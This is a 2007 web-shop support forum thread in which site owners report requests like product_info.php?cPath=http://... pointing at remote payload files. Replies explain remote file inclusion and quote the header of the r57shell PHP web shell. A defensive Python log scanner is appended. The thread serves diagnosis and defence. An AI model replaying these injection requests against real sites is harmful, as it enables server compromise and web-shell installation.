
Strange Site showing up in who's online..


7 replies to this topic

#1   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 04 November 2007 - 21:21

The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why it's happening?

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

Thanks
Ryan
rkoechel2004

#2   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 04 November 2007 - 21:52

> The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why it's happening?
>
> /product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?
>
> Thanks
> Ryan



I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?
rkoechel2004

#3   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 06 November 2007 - 00:45

> I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?



Another new one today with the ip of the user from Canada:

/product_info.php?products_id=http://0x0134.lan.io/pb.php?

Anyone have any thoughts on this?
rkoechel2004

#4   anybeads

anybeads
  • Members
  • 9 posts

Posted 09 November 2007 - 10:57

I got the following ones:
http://amygirl.chat....mages/image.txt?
http://ninaru.hut2.ru/images/cs.txt?
http://amyru.h18.ru/images/cs.txt?
etc

Is it a hacking attempt?

We are using 6.15, is our site safe?

Any help is appreciated, thanks!

David
anybeads.com

#5   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 14 November 2007 - 00:56

> I got the following ones:
> http://amygirl.chat....mages/image.txt?
> http://ninaru.hut2.ru/images/cs.txt?
> http://amyru.h18.ru/images/cs.txt?
> etc
>
> Is it a hacking attempt?
>
> We are using 6.15, is our site safe?
>
> Any help is appreciated, thanks!
>
> David
> anybeads.com


I saw this one today: http://kiopmanminsuion.chat.ru/http?

Does anyone have an idea where this is coming from?
rkoechel2004

#6   Wizky

Wizky
  • Members
  • 1 posts

Posted 18 November 2007 - 00:57

Hello rkoechel2004,
What you are seeing is injection code in your site.

Injection is when some hackers inject this type of info into a site where the server is not secure.

On my servers I see this type of attack every minute, but we do a really good job blocking them. I would suggest that you ask your hosting provider to install a really good firewall system, as it seems it lacks this.

The worst is that if they have managed to install this injection, they could install a zombie script as well.

Edited by Wizky, 18 November 2007 - 00:59.


#7   baddog

baddog
  • Members
  • 1,150 posts

Posted 01 December 2007 - 03:31

> The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why it's happening?
>
> /product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?
>
> Thanks
> Ryan

I'm seeing the same thing. Check out this thread: http://forums.creloa...ic/p=91071.html

#8   vincent_g

vincent_g
  • Members
  • 3 posts

Posted 26 December 2007 - 16:15

> I'm seeing the same thing. Check out this thread: http://forums.creloa...ic/p=91071.html


Check your site for this file: dir.php
This is what he downloads!
<?php
/********************************************************************************
**********************/
/*
/* # # # # # #
/* # # # # # #
/* # # # # # #
/* # # ## #### ## # #
/* # # ## ## # # ## ## # #
/* # # ## ## # # ## ## # #
/* # #### ## # # ## #### #
/* # ### ############ ### #
/* # ########## ########## #
/* # ###### ###### #
/* # ######## ## #### ## ####### #
/* # ### ## #### #### ## ### #
/* # ### ## ## ## ## ## ### #
/* # ### # ## #### ## # ### #
/* # ### ## ## ## ## ## ### #
/* # ## # ## ## # ## #
/* # ## # #### # ## #
/* # ## ## #
/*
/*
/*
/* r57shell.php - a PHP script that lets you execute system commands on the server through the browser
/* You can download the new version on our site: http://rst.void.ru
/* Version: 1.3 (05.03.2006)

This for some reason does not display right - it's a picture of a Spider

This hacker is hitting all PHP apps looking for security holes.
If you don't have the latest version, which I assume blocks this type of hacker attack, then you may have been hacked.

Firewalls do not stop this type of attack since it's a software security problem.
Firewalls prevent port access and not software execution.
The newest version of PHP is helpful in preventing this type of thing.
ModSecurity, which is installed on a server, is very good at stopping many such types of attacks, but rules need to be added to keep up with the newest attack method.
The way the hacker gets in is by passing the text file to your server: cs.txt.
This happens due to poor coding methods that do not prevent this type of thing.
When a URL of this type is passed, the app accepts it and the server copies the cs.txt file to the tmp directory.
He may then download other files to your server in this same manner.

Again, if you suspect you have been hacked, then look around for files that do not belong to you.

Edited by vincent_g, 26 December 2007 - 16:18.
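
Added example (not part of the original thread and not any poster's code): a small access-log scan that flags the pattern reported above, a query parameter such as cPath or products_id whose value is itself a remote URL. It assumes Apache combined log format; the function names, client addresses and log lines are constructed for illustration, with request paths taken from the posts.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Pulls the client address and request URI out of a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*"')
# A query value that is itself a remote URL is the signature seen in the thread.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(log_lines):
    """Return (client, script, parameter, remote_url) for each suspicious value."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, uri = m.groups()
        parts = urlsplit(uri)
        # parse_qsl percent-decodes each value, so http%3A%2F%2F... is
        # compared in the same form as a literal http://...
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((client, parts.path, name, value))
    return hits

def payload_hosts(hits):
    """Count probes per remote host named in the parameter value."""
    return Counter(urlsplit(url.strip()).hostname for _, _, _, url in hits)

# Constructed sample log lines: request paths are the ones quoted in the
# thread; client addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Nov/2007:21:21:00 +0000] "GET /product_info.php'
    '?cPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [04/Nov/2007:21:30:12 +0000] "GET /product_info.php'
    '?cPath=21_35&products_id=12 HTTP/1.1" 200 8034 "http://www.example.com/" "-"',
    '203.0.113.45 - - [06/Nov/2007:00:45:00 +0000] "GET /product_info.php'
    '?products_id=http://0x0134.lan.io/pb.php? HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [04/Nov/2007:21:52:00 +0000] "GET /product_info.php'
    '?cPath=http%3A%2F%2Frumusic.chat.ru%2Frumusic.wav%3F HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
```

The normal catalogue request and the URL in its Referer field are not flagged, because only query values of the requested URI are inspected.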